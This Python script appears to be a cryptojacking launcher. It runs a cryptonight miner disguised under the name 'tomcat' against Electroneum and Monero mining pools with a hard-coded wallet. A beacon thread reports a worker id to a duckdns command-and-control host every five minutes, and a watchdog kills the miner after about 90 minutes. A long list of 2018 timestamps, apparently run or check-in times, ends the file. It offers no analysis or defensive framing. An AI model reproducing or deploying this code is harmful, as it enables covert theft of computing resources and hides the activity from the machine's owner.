import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:22:01.965151
#2018-02-17 16:09:07.017120
#2018-02-17 17:56:05.933819
#2018-02-17 19:44:07.516063
#2018-02-17 21:33:07.390735
#2018-02-17 23:18:04.183009
#2018-02-18 01:06:05.024949
#2018-02-18 02:52:06.515246
#2018-02-18 04:40:06.989347
#2018-02-18 06:32:02.070209
#2018-02-18 08:19:05.857413
#2018-02-18 10:07:06.877844
#2018-02-18 11:53:04.920253
#2018-02-18 13:38:01.357803
#2018-02-18 15:27:06.972470
#2018-02-18 17:16:01.379645
#2018-02-18 19:04:01.691662
#2018-02-18 20:51:06.289845
#2018-02-18 22:38:02.051831
#2018-02-19 00:27:03.544618
#2018-02-19 02:12:03.838159
#2018-02-19 03:58:01.722640
#2018-02-19 05:42:05.003766
#2018-02-19 07:30:07.373363
#2018-02-19 09:20:04.193586
#2018-02-19 11:09:06.523888
#2018-02-19 12:56:08.346765
#2018-02-19 14:44:01.794977
#2018-02-19 16:32:01.272517
#2018-02-19 18:17:06.565206
#2018-02-19 20:03:08.376015
#2018-02-19 21:53:06.602492
#2018-02-19 23:39:06.131769
#2018-02-20 01:26:03.645025
#2018-02-20 03:15:01.566193
#2018-02-20 05:01:07.819114
#2018-02-20 06:43:04.194494
#2018-02-20 08:28:04.444330
#2018-02-20 10:13:01.264109
#2018-02-20 11:57:06.010207
#2018-02-20 13:44:04.329521
#2018-02-20 15:31:01.595432
#2018-02-20 17:18:02.213169
#2018-02-20 19:08:01.464353
#2018-02-20 20:56:02.164223
#2018-02-20 22:40:01.764301
#2018-02-21 00:24:04.567454
#2018-02-21 02:09:07.473245
#2018-02-21 03:56:05.140768
#2018-02-21 05:45:09.150677
#2018-02-21 07:33:06.463548
#2018-02-21 09:18:08.380185
#2018-02-21 11:07:07.042076
#2018-02-21 12:53:10.568218
#2018-02-21 14:40:06.771763
#2018-02-21 16:26:09.892898
#2018-02-21 18:16:01.572386
#2018-02-21 20:02:07.375928
#2018-02-21 21:51:06.537866
#2018-02-21 23:37:05.699336
#2018-02-22 01:24:08.500066
#2018-02-22 03:13:06.791122
#2018-02-22 04:59:01.676158
#2018-02-22 06:42:03.930153
#2018-02-22 08:30:09.132597
#2018-02-22 10:17:07.344960
#2018-02-22 12:02:05.999840
#2018-02-22 13:49:04.333230
#2018-02-22 15:38:09.463770
#2018-02-22 17:24:05.350056
#2018-02-22 19:11:08.221140
#2018-02-22 21:03:04.001997
#2018-02-22 22:48:07.687463
#2018-02-23 00:35:04.076205
#2018-02-23 02:22:06.546681
#2018-02-23 04:12:07.723864
#2018-02-23 05:58:04.751078
#2018-02-23 07:33:03.553862
#2018-02-23 09:34:08.745568
#2018-02-23 11:19:02.158231
#2018-02-23 12:38:06.721631
#2018-02-23 14:05:10.020396
#2018-02-23 15:44:01.544363
#2018-02-23 17:14:01.537018
#2018-02-23 18:45:05.648686
#2018-02-23 20:18:04.123509
#2018-02-23 21:51:07.351058
#2018-02-23 23:26:06.583957
#2018-02-24 00:59:04.013422
#2018-02-24 02:46:06.034264
#2018-02-24 04:21:07.206704
#2018-02-24 06:08:01.987909
#2018-02-24 07:55:06.912780
#2018-02-24 09:39:03.995068
#2018-02-24 11:34:01.980979
#2018-02-24 13:24:08.072088
#2018-02-24 15:13:01.890965
#2018-02-24 17:01:07.403086
#2018-02-24 18:50:06.816669
#2018-02-24 20:39:07.574974
#2018-02-25 01:20:09.817734
#2018-02-25 05:26:06.573513
#2018-02-25 11:35:06.078702